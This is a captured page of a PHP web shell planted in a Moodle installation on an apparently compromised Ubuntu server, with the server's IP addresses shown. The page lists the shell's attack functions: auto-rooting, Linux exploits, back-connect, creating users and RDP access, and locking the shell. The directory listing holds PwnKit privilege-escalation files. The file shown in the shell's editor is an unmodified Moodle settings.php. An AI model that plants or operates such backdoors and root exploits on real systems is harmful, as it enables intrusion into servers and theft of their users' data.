Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
blocks /
myoverview /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
amd
[ DIR ]
drwxrwxrwx
classes
[ DIR ]
drwxrwxrwx
db
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
pix
[ DIR ]
drwxrwxrwx
templates
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
block_myoverview.php
3.96
KB
-rwxrwxrwx
lib.php
5.21
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
settings.php
4.72
KB
-rwxrwxrwx
styles.css
306
B
-rwxrwxrwx
upgrade.txt
294
B
-rwxrwxrwx
version.php
1.17
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : settings.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Settings for the myoverview block * * @package block_myoverview * @copyright 2019 Tom Dickman <tomdickman@catalyst-au.net> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die; if ($ADMIN->fulltree) { require_once($CFG->dirroot . '/blocks/myoverview/lib.php'); // Presentation options heading. $settings->add(new admin_setting_heading('block_myoverview/appearance', get_string('appearance', 'admin'), '')); // Display Course Categories on Dashboard course items (cards, lists, summary items). $settings->add(new admin_setting_configcheckbox( 'block_myoverview/displaycategories', get_string('displaycategories', 'block_myoverview'), get_string('displaycategories_help', 'block_myoverview'), 1)); // Enable / Disable available layouts. $choices = array(BLOCK_MYOVERVIEW_VIEW_CARD => get_string('card', 'block_myoverview'), BLOCK_MYOVERVIEW_VIEW_LIST => get_string('list', 'block_myoverview'), BLOCK_MYOVERVIEW_VIEW_SUMMARY => get_string('summary', 'block_myoverview')); $settings->add(new admin_setting_configmulticheckbox( 'block_myoverview/layouts', get_string('layouts', 'block_myoverview'), get_string('layouts_help', 'block_myoverview'), $choices, $choices)); unset ($choices); // Enable / Disable course filter items. $settings->add(new admin_setting_heading('block_myoverview/availablegroupings', get_string('availablegroupings', 'block_myoverview'), get_string('availablegroupings_desc', 'block_myoverview'))); $settings->add(new admin_setting_configcheckbox( 'block_myoverview/displaygroupingallincludinghidden', get_string('allincludinghidden', 'block_myoverview'), '', 0)); $settings->add(new admin_setting_configcheckbox( 'block_myoverview/displaygroupingall', get_string('all', 'block_myoverview'), '', 1)); $settings->add(new admin_setting_configcheckbox( 'block_myoverview/displaygroupinginprogress', get_string('inprogress', 'block_myoverview'), '', 1)); $settings->add(new admin_setting_configcheckbox( 'block_myoverview/displaygroupingpast', get_string('past', 'block_myoverview'), '', 1)); $settings->add(new admin_setting_configcheckbox( 'block_myoverview/displaygroupingfuture', get_string('future', 'block_myoverview'), '', 1)); $settings->add(new admin_setting_configcheckbox( 'block_myoverview/displaygroupingcustomfield', get_string('customfield', 'block_myoverview'), '', 0)); $choices = \core_customfield\api::get_fields_supporting_course_grouping(); if ($choices) { $choices = ['' => get_string('choosedots')] + $choices; $settings->add(new admin_setting_configselect( 'block_myoverview/customfiltergrouping', get_string('customfiltergrouping', 'block_myoverview'), '', '', $choices)); } else { $settings->add(new admin_setting_configempty( 'block_myoverview/customfiltergrouping', get_string('customfiltergrouping', 'block_myoverview'), get_string('customfiltergrouping_nofields', 'block_myoverview'))); } $settings->hide_if('block_myoverview/customfiltergrouping', 'block_myoverview/displaygroupingcustomfield'); $settings->add(new admin_setting_configcheckbox( 'block_myoverview/displaygroupingfavourites', get_string('favourites', 'block_myoverview'), '', 1)); $settings->add(new admin_setting_configcheckbox( 'block_myoverview/displaygroupinghidden', get_string('hiddencourses', 'block_myoverview'), '', 1)); }
Close